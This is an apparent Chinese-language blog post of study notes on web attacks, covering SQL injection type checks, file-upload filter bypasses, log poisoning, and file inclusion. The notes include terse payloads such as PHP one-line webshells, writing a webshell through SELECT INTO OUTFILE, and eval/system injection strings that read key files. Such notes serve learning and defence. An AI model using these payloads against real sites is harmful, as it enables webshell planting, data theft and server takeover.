<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="表单get,post注入123456字符型注入   字符型注入类型   ![fajf](sql)   判断是字符型注入还是数值型注入       ?id&#x3D;1&#x27; 如果是字符型,不会报错,如果是数字型则报错,下列是报错       and结果为假不出结果,数值字符型报错不出结果    文件注入123456789101112131415161718192021222324252627282">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入">
<meta property="og:url" content="http://example.com/2022/02/23/sql%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="表单get,post注入123456字符型注入   字符型注入类型   ![fajf](sql)   判断是字符型注入还是数值型注入       ?id&#x3D;1&#x27; 如果是字符型,不会报错,如果是数字型则报错,下列是报错       and结果为假不出结果,数值字符型报错不出结果    文件注入123456789101112131415161718192021222324252627282">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-02-23T09:57:12.000Z">
<meta property="article:modified_time" content="2024-12-12T10:03:00.864Z">
<meta property="article:author" content="HWW">
<meta property="article:tag" content="安全">
<meta property="article:tag" content="sql">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2022/02/23/sql%E6%B3%A8%E5%85%A5/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>sql注入 | Hexo</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Hexo</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Do not go gentle into that good night</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/02/23/sql%E6%B3%A8%E5%85%A5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/%E5%A4%B4%E5%83%8F/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20240925172832.jpg">
      <meta itemprop="name" content="HWW">
      <meta itemprop="description" content="Do not go gentle into that good night">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sql注入
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-02-23 17:57:12" itemprop="dateCreated datePublished" datetime="2022-02-23T17:57:12+08:00">2022-02-23</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-12-12 18:03:00" itemprop="dateModified" datetime="2024-12-12T18:03:00+08:00">2024-12-12</time>
              </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>1.9k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>3 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <meta name="referrer" content="no-referrer">

<h1 id="表单get-post注入"><a href="#表单get-post注入" class="headerlink" title="表单get,post注入"></a>表单get,post注入</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">字符型注入</span><br><span class="line">   字符型注入类型</span><br><span class="line">   ![fajf](sql)</span><br><span class="line">   判断是字符型注入还是数值型注入</span><br><span class="line">       ?id=1&#x27; 如果是字符型,不会报错,如果是数字型则报错,下列是报错</span><br><span class="line">       and结果为假不出结果,数值字符型报错不出结果</span><br></pre></td></tr></table></figure>



<h1 id="文件注入"><a href="#文件注入" class="headerlink" title="文件注入"></a>文件注入</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line">黑名单绕过</span><br><span class="line">    apache的httpd-config的配置文件</span><br><span class="line">    pht</span><br><span class="line"></span><br><span class="line">后缀名绕过</span><br><span class="line">    linux服务器对大小写敏感,windows反之</span><br><span class="line">        window特性</span><br><span class="line">            1.php.</span><br><span class="line">            2.php空格</span><br><span class="line">            3.php::$DATA</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    .htaccess文件攻击</span><br><span class="line">        SetHandler application/x-httpd-php该文件的代码会覆盖apache的httpd-config的配置文件,并且将内容按照php语法规则解析</span><br><span class="line"></span><br><span class="line">    php后缀限制,copy php jpeg 拼接</span><br><span class="line"></span><br><span class="line">服务端检测绕过</span><br><span class="line">    MIME类型检测</span><br><span class="line">        image/jepg</span><br><span class="line"></span><br><span class="line">    include包含注入</span><br><span class="line">    日志注入 phpstudy/apache/logs/error.log记录报错日志</span><br><span class="line">        浏览器url注入默认编码,会把php代码重新编码,执行不了,</span><br><span class="line">        抓包,可以防止浏览器重新编码,从而php代码被报错日志文件记录</span><br><span class="line"></span><br><span class="line">    文件包含注入(include) </span><br><span class="line">        参数是file1.php文件,说明参数传入到include包含,执行了file1.php代码</span><br><span class="line">        伪协议注入</span><br><span class="line">            php伪协议</span><br><span class="line">            data伪协议,删text, text/plian</span><br><span class="line">            data;&lt;?php system(&quot;dir&quot;);?&gt;</span><br><span class="line">                linux的代码system运行代码tax 解析文件并显示代码,cat 只解析文件</span><br><span class="line">                system(ls )</span><br><span class="line">                system(ls ../)</span><br><span class="line">                system(cat ../key.php)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">数据库写码</span><br><span class="line">    https://blog.csdn.net/qq_33942040/article/details/108577874</span><br><span class="line">    两种方式</span><br><span class="line">    一种mysql日志写入</span><br><span class="line">    一种直接写入</span><br><span class="line">    ｜ select &#x27;&lt;?php @eval($_POST[w]);?&gt;&#x27; into outfile &#x27;c:/wamp/www/45.php&#x27;</span><br><span class="line"></span><br><span class="line">命令执行和代码(远程)执行</span><br><span class="line">    写小马写在网站目录里面,因为有php环境,可以执行php代码</span><br><span class="line">    命令执行漏洞是直接调用操作系统命令，故这里叫作OS命令执行漏洞，</span><br><span class="line">    代码执行漏洞则是靠执行脚本代码调用操作系统命令。</span><br><span class="line">    命令执行：(系统本地命令) windows常见命令</span><br><span class="line">        net user命令是Windows操作系统中的一个命令行工具</span><br><span class="line">        system()       输出并返回最后一行shell结果</span><br><span class="line">        exec()         执行一个外部程序</span><br><span class="line">        shell_exec()   通过shell环境执行命令，并且将完整的输出以字符串的方式返回</span><br><span class="line">        passthru()     执行外部程序并且显示原始输出</span><br><span class="line">        pcntl_exec()   在当前进程空间执行指定程序</span><br><span class="line">        popen()        打开进程文件指针</span><br><span class="line">        proc_open()    执行一个命令，并且打开用来输入/输出的文件指针</span><br><span class="line">        ?a=type 文件名 ; 查看文件内容</span><br><span class="line">        ?a=cd 查看当前目录路径</span><br><span class="line">        ?a=echo&quot;&lt;?php phpinfo.php;?&gt; &quot; &gt; E:\xamapp\.phpinfo(); 写shell</span><br><span class="line">        ?a=dir </span><br><span class="line"></span><br><span class="line">    远程/代码执行：</span><br><span class="line">        eval()            把字符串作为PHP代码执行</span><br><span class="line">        assert()          检查一个断言是否为 FALSE，可用来执行代码</span><br><span class="line">        preg_replace()    执行一个正则表达式的搜索和替换</span><br><span class="line">        call_user_func()  把第一个参数作为回调函数调用</span><br><span class="line">        call_user_func_array() 调用回调函数，并把一个数组参数作为回调函数的参数</span><br><span class="line">        array_map()       为数组的每个元素应用回调函数</span><br><span class="line"></span><br><span class="line">    利用远程命令执行代码</span><br><span class="line">        ?a=ls </span><br><span class="line">        ?a=@eval($_POST[333]) 一句话木马</span><br><span class="line">        ?a=print(_FILE_)获取当前路径(只能用assert接收并执行,用eval执行不了)</span><br><span class="line">        ?a=var_dump(file_get_contents(&#x27;路径&#x27;));读取文件</span><br><span class="line">        a=var_dump(file_put_contents($_POST[1],$_POST[2]));</span><br><span class="line">            1=shell.php&amp;2=&lt;?php phpinfo();?&gt; 写shell,通过psot传递参数,构造shell.php文件,(在当前路径下)</span><br></pre></td></tr></table></figure>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%AE%89%E5%85%A8/" rel="tag"># 安全</a>
              <a href="/tags/sql/" rel="tag"># sql</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/09/20/hexo%E6%90%AD%E5%BB%BA%E4%B8%AA%E4%BA%BA%E5%8D%9A%E5%AE%A2/" rel="prev" title="hexo搭建个人博客">
      <i class="fa fa-chevron-left"></i> hexo搭建个人博客
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/10/10/vps%E6%90%AD%E5%BB%BA%E8%8A%82%E7%82%B9/" rel="next" title="vps搭建节点">
      vps搭建节点 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%A1%A8%E5%8D%95get-post%E6%B3%A8%E5%85%A5"><span class="nav-number">1.</span> <span class="nav-text">表单get,post注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E6%B3%A8%E5%85%A5"><span class="nav-number">2.</span> <span class="nav-text">文件注入</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="HWW"
      src="/images/%E5%A4%B4%E5%83%8F/%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20240925172832.jpg">
  <p class="site-author-name" itemprop="name">HWW</p>
  <div class="site-description" itemprop="description">Do not go gentle into that good night</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">23</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">21</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">HWW</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
